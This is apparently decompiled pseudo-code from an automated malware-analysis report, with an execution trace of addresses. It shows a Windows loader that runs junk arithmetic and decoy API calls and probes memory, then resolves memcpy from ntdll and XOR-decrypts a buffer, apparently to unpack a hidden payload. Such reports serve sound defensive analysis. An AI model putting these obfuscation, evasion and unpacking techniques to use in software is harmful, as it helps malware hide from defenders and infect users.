									 *0x4631f4 = (0x63e7063f *  *0x463208 >> 0x20 >> 4 >> 0x1f) + _t1156 *  *0x462a28 + (0x63e7063f *  *0x463208 >> 0x20 >> 4) + ( *0x4631d8 & 0x0000ffff) - _t597;
									_t896 =  *0x462b2c; // 0x0
									__eflags = ( *0x4631e4 & 0x0000ffff) *  *0x4631ec - _t896 * _t597 + ( *0x4631fc & 0x000000ff);
									if(( *0x4631e4 & 0x0000ffff) *  *0x4631ec != _t896 * _t597 + ( *0x4631fc & 0x000000ff)) {
										 *0x462f6c = 0;
									}
									_t1159 = LoadBitmapA( *(_t1176 - 0x40), 0x462a28);
									 *(_t1176 + 0x50) = 0x6d656d;
									 *(_t1176 + 0x54) = 0;
									 *(_t1176 + 0x58) = 0;
									 *(_t1176 + 0x5c) = 0;
									__eflags = _t1159;
									if(_t1159 == 0) {
										lstrcatA(_t1176 + 0x50, "cpy");
									}
									 *(_t1176 - 0x24) = GetProcAddress(LoadLibraryA("ntdll"), _t1176 + 0x50);
									_t605 =  *0x4631fc; // 0x789
									__eflags = _t605 - _t1159;
									if(_t605 >= _t1159) {
										_t287 = _t1159 + 1; // 0x1
										__eflags =  *0x463210 - _t287;
										if( *0x463210 != _t287) {
											_t900 =  *0x46320c; // 0x0
											_t1036 =  *0x462f8c; // 0x4770000
											_t1037 = _t1036 + _t900;
											__eflags = _t1037;
											 *0x462f5c = _t1037;
										} else {
											_t957 =  *0x460334; // 0xc30c4
											 *0x462f5c =  &(_t957[ *0x4631d8]);
											_t900 =  *0x46320c; // 0x0
										}
									} else {
										_t959 =  *0x4631f0; // 0x3b8402f
										 *0x462f5c = _t959;
										_t900 =  *0x46320c; // 0x0
									}
									_t289 = _t900 + 3; // 0x3
									_t290 = _t900 + 1; // 0x1
									_t606 =  *0x4631ec; // 0x0
									_t608 =  *0x463210; // 0x0
									_t841 = (_t290 * _t605 + _t606 *  *0x4631d8 - _t608) * (_t900 + _t289) +  *0x463204;
									 *(_t1176 - 0x38) = _t841;
									_t1039 = 0;
									__eflags = _t1159;
									if(_t1159 != 0) {
										L170:
										_t609 =  *0x462f5c; // 0x4770000
										 *_t609 = _t900;
										goto L171;
									} else {
										__eflags =  *0x4631ec - _t1039; // 0x0
										if(__eflags != 0) {
											goto L170;
										}
										_t293 = _t900 + 0x45d300; // 0x45d300
										_t1083 =  *0x462f5c; // 0x4770000
										_t609 =  *(_t1176 - 0x24)(_t1083, _t608 + _t293, _t841);
										_t1179 = _t1179 + 0xc;
										_t1039 = 0;
										L171:
										_t901 =  *0x4631ec; // 0x0
										__eflags =  *0x46320c - _t901 +  *0x463210; // 0x0
										if(__eflags != 0) {
											L183:
											_t610 = 0;
											__eflags =  *0x4631fc - _t1039; // 0x789
											if(__eflags != 0) {
												_t610 = _t1176 - 0x40;
											}
											__eflags =  *0x463210 - _t1039; // 0x0
											if(__eflags == 0) {
												_t942 =  *0x462f5c; // 0x4770000
												 *((intOrPtr*)(_t942 + 1)) = _t610;
											}
											__eflags =  *(_t1176 - 0x40) - _t1039;
											if( *(_t1176 - 0x40) != _t1039) {
												L193:
												_t903 =  *0x462f60; // 0x3b8402f
												 *0x462740 = _t903 -  *0x4631f4 -  *0x462740 +  *0x462b40;
												_t611 =  *0x460334; // 0xc30c4
												 *0x462f6c =  *0x462f6c -  &(_t611[ *0x463210]);
												_t613 =  *0x463200; // 0x211
												__eflags = (_t613 & 0x0000ffff) +  *0x462f64;
												if((_t613 & 0x0000ffff) +  *0x462f64 != 0) {
													_t354 = _t613 + 0x3a; // 0x24b
													_t655 =  *0x4631dc; // 0x2ad58
													asm("cdq");
													 *0x462b34 =  *0x462b34 + (0xb13b13b1 *  *0x462f7c >> 0x20 >> 2 >> 0x1f) + (0xb13b13b1 *  *0x462f7c >> 0x20 >> 2) - _t655 / _t354 -  *0x463208;
													_t1039 = 0;
													__eflags = 0;
												}
												__eflags =  *0x46320c - _t1039; // 0x0
												if(__eflags == 0) {
													L244:
													GetLocalTime(_t1176 + 0x50);
													GetTimeFormatW(0x400, 2, _t1176 + 0x50, 0, _t1176 + 0x470, 0x104);
													_t616 =  *0x463210; // 0x0
													SendMessageW(_t616, 0xc2, 1, _t1176 + 0x470);
													_t910 =  *0x4631ec; // 0x0
													SendMessageW(_t910, 0xc2, 1, " ");
													GetDateFormatW(0x400, 0, _t1176 + 0x50, 0, _t1176 + 0x470, 0x104);
													_t1043 =  *0x463210; // 0x0
													SendMessageW(_t1043, 0xc2, 1, _t1176 + 0x470);
													 *(_t1176 - 0x38) = 1;
													 *((intOrPtr*)(_t1176 - 4)) = 0;
													__eflags = (0x66666667 *  *0x463204 >> 0x20 >> 1 >> 0x1f) + (0x66666667 *  *0x463204 >> 0x20 >> 1) -  *0x46320c; // 0x0
													if(__eflags >= 0) {
														 *0x4631d8 =  *0x4631e4 & 0x0000ffff;
													}
													_t912 =  *0x463210; // 0x0
													_t627 =  *0x4631fc; // 0x789
													asm("cdq");
													_t914 =  *0x4631f4; // 0xfff48ebd
													 *0x4631d8 = _t914 *  *0x4631e4 - _t627 / (_t912 + 0x5e) * (_t914 & 0x000000ff);
													 *(_t1176 - 0x4c) = 0x5c;
													while(1) {
														__eflags = 1 -  *0x46320c; // 0x0
														if(__eflags >= 0) {
															_t842 =  *0x463200; // 0x211
															_t914 = _t914 + 1 / (_t842 + 0x45) * 0 -  *0x462f60 -  *0x4631fc +  *0x4631ec;
															__eflags = _t914;
															 *0x4631f4 = _t914;
														}
														_t1051 =  *0x462f5c; // 0x4770000
														__eflags = _t1051 -  *0x4631dc; // 0x2ad58
														if(__eflags > 0) {
															_t632 =  *0x4631e8; // 0x789
															_t1051 = 1 + _t632;
															 *0x462f5c = 1 + _t632;
														}
														__eflags = _t914 -  *0x460334; // 0xc30c4
														if(__eflags > 0) {
															_t631 =  *0x463204; // 0x4
															 *0x462f5c = _t631;
														}
														HideCaret(0);
														_t493 = _t1176 - 0x4c;
														 *_t493 =  *(_t1176 - 0x4c) - 1;
														__eflags =  *_t493;
														if( *_t493 == 0) {
															break;
														}
														_t914 =  *0x4631f4; // 0xfff48ebd
													}
													 *((intOrPtr*)(_t1176 - 4)) = 0xfffffffe;
													goto L257;
												} else {
													_t1163 =  *0x463214; // 0x0
													_t1164 = _t1163 + 1;
													 *(_t1176 - 0x30) = _t1164;
													_t640 =  *0x46320c; // 0x0
													 *(_t1176 - 0x24) = _t640;
													__eflags = _t640 - _t1039;
													if(_t640 != _t1039) {
														StartPage(_t1164);
													}
													GetTextMetricsW(_t1164, _t1176 + 0x73c);
													_t1165 =  *(_t1176 + 0x5c);
													_t1132 =  *(_t1176 + 0x58);
													_t846 =  *(_t1176 + 0x50);
													do {
														__eflags = _t1165;
														if(_t1165 != 0) {
															L216:
															__eflags =  *0x46320c;
															if( *0x46320c == 0) {
																_t642 = _t1165;
																L226:
																 *(_t1176 - 0x28) = _t642;
																L227:
																__eflags =  *(_t1176 - 0x24);
																if( *(_t1176 - 0x24) != 0) {
																	ExtTextOutW( *(_t1176 - 0x30),  *(_t1176 + 0x40),  *(_t1176 - 0x1c), 4, _t1176 + 0x40, _t1132, _t642, 0);
																	_t642 =  *(_t1176 - 0x28);
																}
																_t1165 = _t1165 - _t642;
																__eflags = _t1165;
																if(_t1165 == 0) {
																	_t921 =  *(_t1176 - 0x1c);
																	__eflags = _t846 -  *(_t1176 + 0x54);
																	if(_t846 >=  *(_t1176 + 0x54)) {
																		break;
																	}
																	_t1054 =  *(_t1176 + 0x73c);
																	while(1) {
																		__eflags = _t921 -  *(_t1176 - 0x38);
																		if(_t921 >=  *(_t1176 - 0x38)) {
																			break;
																		}
																		_t650 =  *_t846 & 0x0000ffff;
																		__eflags = _t650 - 0xa;
																		if(_t650 == 0xa) {
																			L237:
																			_t921 = _t921 +  *(_t1176 + 0x74c) + _t1054;
																			__eflags = _t921;
																			L238:
																			_t846 = _t846 + 2;
																			__eflags = _t846 -  *(_t1176 + 0x54);
																			if(_t846 <  *(_t1176 + 0x54)) {
																				continue;
																			}
																			break;
																		}
																		__eflags = _t650 - 0xd;
																		if(_t650 != 0xd) {
																			break;
																		}
																		__eflags = _t650 - 0xa;
																		if(_t650 != 0xa) {
																			goto L238;
																		}
																		goto L237;
																	}
																	 *(_t1176 - 0x1c) = _t921;
																	goto L240;
																} else {
																	E004224A0(_t1132,  &(_t1132[_t642]), _t1165 + _t1165);
																	_t1179 = _t1179 + 0xc;
																	 *(_t1176 - 0x1c) =  *(_t1176 - 0x1c) +  *(_t1176 + 0x74c) +  *(_t1176 + 0x73c);
																	_t921 =  *(_t1176 - 0x1c);
																	L240:
																	__eflags = _t846 -  *(_t1176 + 0x54);
																	if(_t846 >=  *(_t1176 + 0x54)) {
																		break;
																	}
																	goto L241;
																}
															}
															GetTextExtentExPointW( *(_t1176 - 0x30), _t1132, _t1165,  *((intOrPtr*)(_t1176 + 0x48)) -  *(_t1176 + 0x40), _t1176 - 0x28, 0, _t1176 + 0x58);
															_t642 =  *(_t1176 - 0x28);
															__eflags = _t642 - _t1165;
															if(_t642 >= _t1165) {
																goto L227;
															}
															__eflags = _t1132[_t642] - 0x20;
															if(_t1132[_t642] == 0x20) {
																goto L227;
															}
															_t929 = _t642;
															__eflags = _t642;
															if(_t642 == 0) {
																L223:
																__eflags = _t929;
																if(_t929 <= 0) {
																	goto L227;
																}
																_t642 = _t929 + 1;
																goto L226;
															}
															while(1) {
																__eflags = _t1132[_t929] - 0x20;
																if(_t1132[_t929] == 0x20) {
																	goto L223;
																}
																_t929 = _t929 - 1;
																__eflags = _t929;
																if(_t929 != 0) {
																	continue;
																}
																goto L223;
															}
															goto L223;
														}
														_t930 =  *(_t1176 + 0x54);
														__eflags = _t846 - _t930;
														if(_t846 >= _t930) {
															goto L216;
														}
														while(1) {
															_t649 =  *_t846 & 0x0000ffff;
															__eflags = _t649 - 0xa;
															if(_t649 == 0xa) {
																goto L216;
															}
															__eflags = _t649 - 0xd;
															if(_t649 == 0xd) {
																goto L216;
															}
															__eflags = _t649 - 9;
															if(_t649 != 9) {
																__eflags = _t1165 - 4;
																if(_t1165 >= 4) {
																	goto L216;
																}
																L213:
																_t1132[_t1165] = _t649;
																_t1165 = _t1165 + 1;
																__eflags = _t1165;
																L214:
																__eflags = _t1165 - 4;
																if(_t1165 >= 4) {
																	goto L216;
																}
																_t846 = _t846 + 2;
																__eflags = _t846 - _t930;
																if(_t846 < _t930) {
																	continue;
																}
																goto L216;
															}
															__eflags = _t1165 -  *0x46320c; // 0x0
															if(__eflags >= 0) {
																goto L214;
															}
															_t1132[_t1165] = 0x20;
															_t1165 = _t1165 + 1;
															__eflags = _t1165 -  *0x46320c; // 0x0
															if(__eflags >= 0) {
																goto L214;
															}
															_t649 = 0x20;
															_t1132[_t1165] = 0x20;
															_t1165 = _t1165 + 1;
															__eflags = _t1165 -  *0x46320c; // 0x0
															if(__eflags >= 0) {
																goto L214;
															}
															_t1132[_t1165] = 0x20;
															_t1165 = _t1165 + 1;
															__eflags = _t1165 -  *0x46320c; // 0x0
															if(__eflags >= 0) {
																goto L214;
															}
															goto L213;
														}
														goto L216;
														L241:
														__eflags = _t921 -  *(_t1176 - 0x38);
													} while (_t921 <  *(_t1176 - 0x38));
													__eflags =  *(_t1176 - 0x24);
													if( *(_t1176 - 0x24) != 0) {
														EndPage( *(_t1176 - 0x30));
													}
													goto L244;
												}
											} else {
												 *(_t1176 + 0x73c) = 0x3c;
												 *(_t1176 + 0x740) = _t1039;
												 *(_t1176 + 0x744) = _t1039;
												 *(_t1176 + 0x748) = _t1176;
												 *(_t1176 + 0x74c) = _t1039;
												 *(_t1176 + 0x750) = 1;
												 *(_t1176 + 0x754) = _t1039;
												 *(_t1176 + 0x758) = _t1039;
												 *(_t1176 + 0x75c) = _t1039;
												 *(_t1176 + 0x760) = _t1039;
												 *(_t1176 + 0x764) = _t1039;
												 *(_t1176 + 0x768) = _t1039;
												 *((short*)(_t1176 + 0x76c)) = 0x2000;
												 *(_t1176 + 0x770) = _t1039;
												 *(_t1176 + 0x774) = _t1039;
												__eflags =  *0x46320c - _t1039; // 0x0
												if(__eflags != 0) {
													ChooseFontA(_t1176 + 0x73c);
												}
												CreateFontIndirectA( *(_t1176 + 0x748));
												_t1167 =  *0x4631ec; // 0x0
												_t847 = BeginPaint(_t1167, _t1176 + 0x738);
												_t1051 =  *(_t1176 - 0x38);
												SelectObject(_t847,  *(_t1176 - 0x38));
												_t669 =  *0x46320c; // 0x0
												TextOutA(_t847, 0, 0, 0x462a28, _t669);
												EndPaint(_t1167, _t1176 + 0x738);
												_t848 =  *(_t1176 - 0x40);
												_t1168 =  *0x4631ec; // 0x0
												_t935 =  *0x46320c; // 0x0
												_t673 = _t935 - 1;
												__eflags = _t673;
												if(_t673 == 0) {
													__imp__#17();
													_t1169 = CreateWindowExA(0, "SysListView32", 0, 0x50800001, 0xa, 0xa, 0x1f4, 0xc8, _t1168, 0, _t848, 0);
													_t936 =  *0x46320c; // 0x0
													 *(_t1176 - 0x38) = ImageList_LoadImageA(_t848,  *0x4631d8 & 0x0000ffff, 1, 0xffffff, _t936, 0, 0);
													_t676 =  *0x46320c; // 0x0
													_t677 = ImageList_LoadImageA(_t848,  *0x4631dc & 0x0000ffff, 1, 0xffffff, _t676, 0, 0);
													SendMessageA(_t1169, 0x1003, 1,  *(_t1176 - 0x38));
													SendMessageA(_t1169, 0x1003, 0, _t677);
													 *(_t1176 + 0x10) = 0xf;
													 *(_t1176 + 0x14) = 0;
													 *(_t1176 + 0x18) = 0x96;
													 *(_t1176 + 0x1c) = 0x4515f5;
													 *(_t1176 + 0x24) = 0;
													SendMessageA(_t1169, 0x101b, 0, _t1176 + 0x10);
													 *(_t1176 + 0x1c) = 0x4515f5;
													 *(_t1176 + 0x24) = 1;
													SendMessageA(_t1169, 0x101b, 1, _t1176 + 0x10);
													 *(_t1176 + 0x18) = 0x12c;
													 *(_t1176 + 0x1c) = 0x4515f5;
													 *(_t1176 + 0x24) = 2;
													SendMessageA(_t1169, 0x101b, 2, _t1176 + 0x10);
													 *(_t1176 + 0x73c) = 3;
													 *(_t1176 + 0x748) = 0;
													 *(_t1176 + 0x74c) = 0;
													 *(_t1176 + 0x758) = 0;
													 *(_t1176 + 0x744) = 0;
													 *(_t1176 + 0x740) = 0;
													 *(_t1176 + 0x750) = 0x4515f5;
													SendMessageA(_t1169, 0x1007, 0, _t1176 + 0x73c);
													 *(_t1176 + 0x758) = 0xffffffff;
													 *(_t1176 + 0x744) = 1;
													 *(_t1176 + 0x750) = "1";
													SendMessageA(_t1169, 0x1006, 0, _t1176 + 0x73c);
													 *(_t1176 + 0x744) = 2;
													 *(_t1176 + 0x750) = 0x4515f5;
													SendMessageA(_t1169, 0x1006, 0, _t1176 + 0x73c);
													 *(_t1176 + 0x758) = 0;
													 *(_t1176 + 0x740) = 1;
													 *(_t1176 + 0x744) = 0;
													 *(_t1176 + 0x750) = 0x4515f5;
													SendMessageA(_t1169, 0x1007, 0, _t1176 + 0x73c);
													 *(_t1176 + 0x758) = 0xffffffff;
													 *(_t1176 + 0x744) = 1;
													 *(_t1176 + 0x750) = "5";
													SendMessageA(_t1169, 0x1006, 0, _t1176 + 0x73c);
													 *(_t1176 + 0x744) = 2;
													 *(_t1176 + 0x750) = 0x4515f5;
													SendMessageA(_t1169, 0x1006, 0, _t1176 + 0x73c);
													 *(_t1176 + 0x758) = 1;
													 *(_t1176 + 0x740) = 2;
													 *(_t1176 + 0x744) = 0;
													 *(_t1176 + 0x750) = 0x4515f5;
													SendMessageA(_t1169, 0x1007, 0, _t1176 + 0x73c);
													 *(_t1176 + 0x758) = 0xffffffff;
													 *(_t1176 + 0x744) = 1;
													 *(_t1176 + 0x750) = "1";
													_t1051 = _t1176 + 0x73c;
													SendMessageA(_t1169, 0x1006, 0, _t1176 + 0x73c);
													 *(_t1176 + 0x744) = 2;
													 *(_t1176 + 0x750) = 0x4515f5;
													SendMessageA(_t1169, 0x1006, 0, _t1176 + 0x73c);
													goto L257;
												} else {
													__eflags = _t673 == 1;
													if(_t673 == 1) {
														PostQuitMessage(0);
														L257:
														_t638 = 0;
														__eflags = 0;
														goto L258;
													}
													_t1068 =  *0x4631f4; // 0xfff48ebd
													_t699 =  *0x460334; // 0xc30c4
													DefWindowProcA(_t1168, _t935, _t699, _t1068);
													_t1039 = 0;
													__eflags = 0;
													goto L193;
												}
											}
										}
										_t1170 =  *0x463204; // 0x4
										_t1171 = _t1170 + 0xde;
										_t943 =  *0x462f5c; // 0x4770000
										 *(_t1176 - 0x20) = _t943;
										 *(_t1176 - 0x28) = 0;
										__imp__WSACreateEvent();
										 *(_t1176 - 0x24) = _t609;
										_t944 =  *0x4631e4; // 0x0
										 *(_t1176 + 0x678 + _t944 * 4) = _t609;
										__imp__WSAWaitForMultipleEvents(1, _t1176 + 0x678, 0, _t944, 0);
										_t945 =  *0x4631e4; // 0x0
										__eflags = _t609 - _t945;
										if(_t609 == _t945) {
											L182:
											_t1039 = 0;
											__eflags = 0;
											goto L183;
										}
										_t702 =  *0x4631ec; // 0x0
										 *(_t1176 - 0x30) = _t702;
										__eflags =  *(_t1176 - 0x24) -  *0x4631e8; // 0x789
										if(__eflags != 0) {
											_t955 = _t945 + 1;
											__eflags = _t955;
											 *(_t1176 - 0x30) = _t955;
										}
										 *(_t1176 - 0x1c) = 0;
										__eflags = _t841;
										if(_t841 > 0) {
											do {
												 *(_t1176 - 0x39) =  *((intOrPtr*)( *(_t1176 - 0x1c) +  *(_t1176 - 0x20)));
												_t704 =  *0x4631ec; // 0x0
												_t705 = ShowWindow(_t704, 5); // executed
												__eflags = _t705;
												if(_t705 != 0) {
													_t954 =  *0x4631d8; // 0xfff48ebd
													_t1082 =  *0x4631ec; // 0x0
													EnumChildWindows(_t1082, E00408860, _t954);
												}
												_t711 =  *(_t1176 - 0x28) - ((0x55555556 *  &(( *(_t1176 - 0x28))[_t1171]) >> 0x20) + (0x55555556 *  &(( *(_t1176 - 0x28))[_t1171]) >> 0x20 >> 0x1f)) * _t1171;
												_t949 = _t711 ^  *(_t1176 - 0x39);
												_t1077 =  *(_t1176 - 0x1c);
												__eflags = _t1171;
												if(_t1171 == 0) {
													 *(_t1077 +  *(_t1176 - 0x20)) =  *(_t1176 - 0x20);
												} else {
													 *(_t1077 +  *(_t1176 - 0x20)) = _t949;
													_t841 =  *(_t1176 - 0x38);
												}
												 *(_t1176 - 0x28) =  *(_t1176 - 0x28) + _t711 *  *(_t1176 - 0x30) * (_t711 *  &( *(_t1176 - 0x30)->i) +  *(_t1176 - 0x28) * _t1171) * _t1171;
												_t716 =  &( *(_t1176 - 0x1c)->i);
												 *(_t1176 - 0x1c) = _t716;
												__eflags = _t716 - _t841;
											} while (_t716 < _t841);
										}
										goto L182;
									}
								}
								ExitProcess(0);
							} else {
								goto L147;
							}
						}
					} else {
						 *(_t1176 - 0x24) = 0;
						_t749 =  *0x4631fc; // 0x789
						asm("cdq");
						_t1104 = _t1004 & 0x00000003;
						if(_t749 + _t1104 >> 2 <= 0) {
							goto L117;
						} else {
							L83:
							while(1) {
								if( *0x4631e4 != 0) {
									L113:
									_t969 =  *(_t1176 - 0x24) + 1;
									 *(_t1176 - 0x24) = _t969;
									_t752 =  *0x4631fc; // 0x789
									asm("cdq");
									_t1104 = _t1104 & 0x00000003;
									if(_t969 >= _t752 + _t1104 >> 2) {
										_t872 =  *0x4631e8; // 0x789
										goto L117;
									}
									_t824 =  *(_t1176 - 0x20);
									continue;
								}
								_t755 = midiInGetNumDevs();
								 *(_t1176 - 0x28) = _t755;
								_t1173 = 0;
								if(_t755 <= 0) {
									L92:
									_t1105 =  *0x4631dc; // 0x2ad58
									_t756 =  *0x463210; // 0x0
									_t1154 = GetDlgItem(_t756, _t1105);
									_t1134 = BeginPaint(_t1154, _t1176 + 0x738);
									_t1106 =  *0x4631e4; // 0x0
									 *(_t1176 - 0x28) = _t1106;
									 *(_t1176 - 0x1c) =  *(_t1176 - 0x1c) + GetClientRect(_t1154, _t1176 + 0x50);
									_t856 = CreateFontA(0x5a, 0x1e, 0, 0, 0x96, 0, 0, 0, 0, 5, 0, 4, 0, "Arial");
									SelectObject(_t1134, _t856);
									_t763 = DeleteObject(_t856);
									 *(_t1176 - 0x1c) =  *(_t1176 - 0x1c) + SetBkMode(_t1134, 1);
									 *(_t1176 - 0x1c) =  *(_t1176 - 0x1c) + DrawTextA(_t1134, "map", 4, _t1176 + 0x50, 0x25);
									 *(_t1176 - 0x28) =  &(( &(( *(_t1176 - 0x28))[_t763]))[EndPaint(_t1154, _t1176 + 0x738)]);
									_t768 = VirtualQuery(0, _t1176 + 0x20, 0x1c);
									_t833 = 1;
									if(_t768 == 0) {
										L98:
										_t1051 =  *0x463210; // 0x0
										if(_t1051 >=  *(_t1176 - 0x28)) {
											L115:
											_t638 =  *0x46320c; // 0x0
											L258:
											 *[fs:0x0] =  *((intOrPtr*)(_t1176 - 0x10));
											_pop(_t1131);
											_pop(_t1162);
											_pop(_t845);
											__eflags =  *(_t1176 + 0x778) ^ _t1176;
											return E004230EF(_t638, _t845,  *(_t1176 + 0x778) ^ _t1176, _t1051, _t1131, _t1162);
										}
										_t1258 =  *(_t1176 - 0x20) -  *0x4631ec; // 0x0
										if(_t1258 != 0) {
											goto L115;
										}
										_t1259 =  *(_t1176 - 0x1c) -  *0x4631e4; // 0x0
										if(_t1259 != 0 ||  *0x4631f0 == 0) {
											goto L115;
										} else {
											_t1261 =  *(_t1176 - 0x30) -  *0x46320c; // 0x0
											_t577 =  *0x460334; // 0xc30c4
											if(_t1261 < 0) {
												 *0x4631dc =  *0x4631dc +  *(_t1176 - 0x38) * _t577;
											}
											_t973 =  *0x4631f4; // 0xfff48ebd
											if(_t577 > _t973) {
												 *0x4631dc =  *0x4631dc + _t833;
											}
											if( *0x4631fc == 0) {
												L147:
												ExitProcess(0);
											} else {
												_t771 =  &(_t577[_t973]);
												if(_t771 == 0x110) {
													PostMessageA(_t1051, 0x8000, 0, 0);
												} else {
													if(_t771 == 0x8000) {
														SHAutoComplete(SendDlgItemMessageA(GetParent(_t1051), 0x47c, 0x407, 0, 0), 0x20000000);
													}
												}
												if( *0x462f60 == 0) {
													_t1104 =  *0x4631fc; // 0x789
													_t773 =  *0x4631f0; // 0x3b8402f
													 *_t773 = _t1104;
												}
												goto L113;
											}
										}
									}
									_t1154 = VirtualQuery;
									do {
										if(( *(_t1176 + 0x30) & 0x00001000) != 0 && ( *(_t1176 + 0x28) & 0x000000ee) != 0) {
											 *0x4631dc =  *0x4631dc + _t833;
										}
									} while (VirtualQuery( *(_t1176 + 0x2c) +  *(_t1176 + 0x20), _t1176 + 0x20, 0x1c) != 0);
									goto L98;
								}
								_t1135 = _t1176 + 0x6f8;
								do {
									_t781 = midiInGetDevCapsA(_t1173, _t1176 + 0x10, 0x2c);
									_t824 = _t824 + _t781 + midiInOpen(_t1135, _t1173, E00408860, 0, 0x30000);
									midiInStart( *_t1135);
									if( *0x463210 == 0) {
										midiInClose( *_t1135);
									}
									if( *0x4631f0 != 0) {
										_t861 =  *0x463210; // 0x0
										_t824 = _t861 +  *0x4631e4;
									}
									_t1173 = _t1173 + 1;
									_t1135 =  &(_t1135[1]);
								} while (_t1173 <  *(_t1176 - 0x28));
								 *(_t1176 - 0x20) = _t824;
								goto L92;
							}
						}
					}
				} else {
					_t799 =  *(_t1176 - 0x30);
					if(_t799 == 0x52 && _t799 == 0x49 &&  *((intOrPtr*)(_t1176 - 0x2e)) == 0x46 &&  *((intOrPtr*)(_t1176 - 0x2d)) == 0x46) {
						mmioSeek(_t866, 0, 0);
						_t802 = 0;
						 *(_t1176 + 0x3c) = 0;
						 *(_t1176 + 0x40) = 0;
						 *((intOrPtr*)(_t1176 + 0x44)) = 0;
						 *((intOrPtr*)(_t1176 + 0x48)) = 0;
						 *(_t1176 + 0x4c) = 0;
						 *((intOrPtr*)(_t1176 + 0x44)) = 0x33504d52;
						while( *((char*)(_t1176 + _t802 + 0x678)) != 0x52) {
							_t863 =  *((intOrPtr*)(_t1176 + _t802 + 0x679));
							if(_t863 == 0x4d) {
								break;
							}
							_t1115 =  *((intOrPtr*)(_t1176 + _t802 + 0x67a));
							if(_t1115 == 0x50) {
								break;
							}
							_t989 =  *((intOrPtr*)(_t1176 + _t802 + 0x67b));
							if(_t989 == 0x33) {
								break;
							}
							if(_t863 == 0x52 || _t1115 == 0x4d || _t989 == 0x50) {
								L31:
								_t802 = _t802 + 1;
								break;
							} else {
								_t864 =  *((intOrPtr*)(_t1176 + _t802 + 0x67c));
								if(_t864 == 0x33) {
									goto L31;
								}
								if(_t1115 == 0x52 || _t989 == 0x4d || _t864 == 0x50) {
									L32:
									_t802 = _t802 + 2;
									break;
								} else {
									_t1116 =  *((intOrPtr*)(_t1176 + _t802 + 0x67d));
									if(_t1116 == 0x33) {
										goto L32;
									}
									if(_t989 == 0x52 || _t864 == 0x4d || _t1116 == 0x50) {
										L33:
										_t802 = _t802 + 3;
										break;
									} else {
										_t990 =  *((intOrPtr*)(_t1176 + _t802 + 0x67e));
										if(_t990 == 0x33) {
											goto L33;
										}
										if(_t864 == 0x52 || _t1116 == 0x4d || _t990 == 0x50 ||  *((char*)(_t1176 + _t802 + 0x67f)) == 0x33) {
											_t802 = _t802 + 4;
											__eflags = _t802;
											break;
										} else {
											_t802 = _t802 + 5;
											if(_t802 < 0xfa) {
												continue;
											} else {
												break;
											}
										}
									}
								}
							}
						}
						if(_t802 == 0xfa) {
							goto L64;
						}
						_t804 = mmioDescend( *(_t1176 - 0x1c), _t1176 + 0x3c, 0, 0x20);
						if(_t804 == 0) {
							 *(_t1176 + 0x28) = _t804;
							 *(_t1176 + 0x2c) = _t804;
							 *(_t1176 + 0x30) = _t804;
							 *(_t1176 + 0x34) = _t804;
							 *(_t1176 + 0x38) = _t804;
							 *(_t1176 + 0x30) = 0x61746164;
							_t1174 = 0;
							while( *((char*)(_t1176 + _t1174 + 0x678)) != 0x64) {
								_t987 =  *((intOrPtr*)(_t1176 + _t1174 + 0x679));
								if(_t987 == 0x61) {
									break;
								}
								_t815 =  *((intOrPtr*)(_t1176 + _t1174 + 0x67a));
								if(_t815 == 0x74) {
									break;
								}
								_t1114 =  *((intOrPtr*)(_t1176 + _t1174 + 0x67b));
								if(_t1114 == 0x61) {
									break;
								}
								if(_t987 == 0x64 || _t815 == 0x61 || _t1114 == 0x74) {
									L57:
									_t1174 = _t1174 + 1;
									break;
								} else {
									_t988 =  *((intOrPtr*)(_t1176 + _t1174 + 0x67c));
									if(_t988 == 0x61) {
										goto L57;
									}
									if(_t815 == 0x64 || _t988 == 0x74) {
										L58:
										_t1174 = _t1174 + 2;
										break;
									} else {
										_t816 =  *((intOrPtr*)(_t1176 + _t1174 + 0x67d));
										if(_t816 == 0x61) {
											goto L58;
										}
										if(_t1114 == 0x64 || _t816 == 0x74) {
											L59:
											_t1174 = _t1174 + 3;
											break;
										} else {
											_t817 =  *((intOrPtr*)(_t1176 + _t1174 + 0x67e));
											if(_t817 == 0x61) {
												goto L59;
											}
											if(_t988 == 0x64 || _t817 == 0x74 ||  *((intOrPtr*)(_t1176 + _t1174 + 0x67f)) == 0x61) {
												_t1174 = _t1174 + 4;
												__eflags = _t1174;
												break;
											} else {
												_t1174 = _t1174 + 5;
												if(_t1174 < 0xfa) {
													continue;
												} else {
													break;
												}
											}
										}
									}
								}
							}
							if(_t1174 != 0xfa) {
								_t806 = mmioDescend( *(_t1176 - 0x1c), _t1176 + 0x28, _t1176 + 0x3c, 0x10);
								if(_t806 == 0) {
									mmioSeek( *(_t1176 - 0x1c), _t806, 1);
									_t1175 = _t1174 + 4;
									 *(_t1176 - 0x28) = _t1175;
									 *(_t1176 - 0x30) = ((((( &(_t1175[0x67b]))[_t1176] & 0x000000ff) << 8) + (( &(_t1175[0x67a]))[_t1176] & 0x000000ff) << 8) + (( &(_t1175[0x679]))[_t1176] & 0x000000ff) << 8) + (( &(_t1175[0x678]))[_t1176] & 0x000000ff);
								}
							}
						}
					}
					goto L64;
				}
			}

0x00408b21
0x00408b2e
0x00408b30
0x00408b35
0x00408b40
0x00408b41
0x00408b44
0x00408b49
0x00408b4c
0x00408b4e
0x00408b57
0x00408b5b
0x00408b61
0x00408b6a
0x00408b6d
0x00408b73
0x00408b7a
0x00408ba3
0x00408ba9
0x00408ba9
0x00408b7c
0x00408b7c
0x00408b84
0x00408b8d
0x00408b9c
0x00408b9c
0x00408bb1
0x00408bb4
0x00408bb7
0x00408bbd
0x00408bc7
0x00408e28
0x00408e2e
0x00408e51
0x00408e57
0x00408e5c
0x00408e6f
0x00408e84
0x00408e8c
0x00408e8f
0x00408e8f
0x00408e8c
0x00408ea4
0x00408eb3
0x00408ebb
0x00408f03
0x00408f03
0x00408f0f
0x00408f15
0x00408f1c
0x00408f2a
0x00408f30
0x00408f36
0x00408f3d
0x00408f49
0x00408f4f
0x00408f56
0x00408f5d
0x00408f62
0x00408f69
0x00408f6f
0x00408fa9
0x00408fae
0x00408fb4
0x00408fba
0x00408fc1
0x00408fc6
0x00408fc6
0x00408fbc
0x00408fbc
0x00408fbc
0x00408fcd
0x00408fd0
0x00408fd3
0x00408fd6
0x00408fdc
0x00408fe3
0x00408fe9
0x00408fef
0x00408ff5
0x00409008
0x00409010
0x00409018
0x00409021
0x00409021
0x00409027
0x0040902d
0x00409033
0x004092dd
0x004092dd
0x004092df
0x004092e5
0x004092e7
0x004092e9
0x004092ef
0x004092f1
0x004092f3
0x004092f5
0x00409308
0x00409308
0x0040930e
0x00409314
0x00409318
0x00409318
0x004092f3
0x004092ef
0x00409346
0x0040934c
0x0040934f
0x00409355
0x00409368
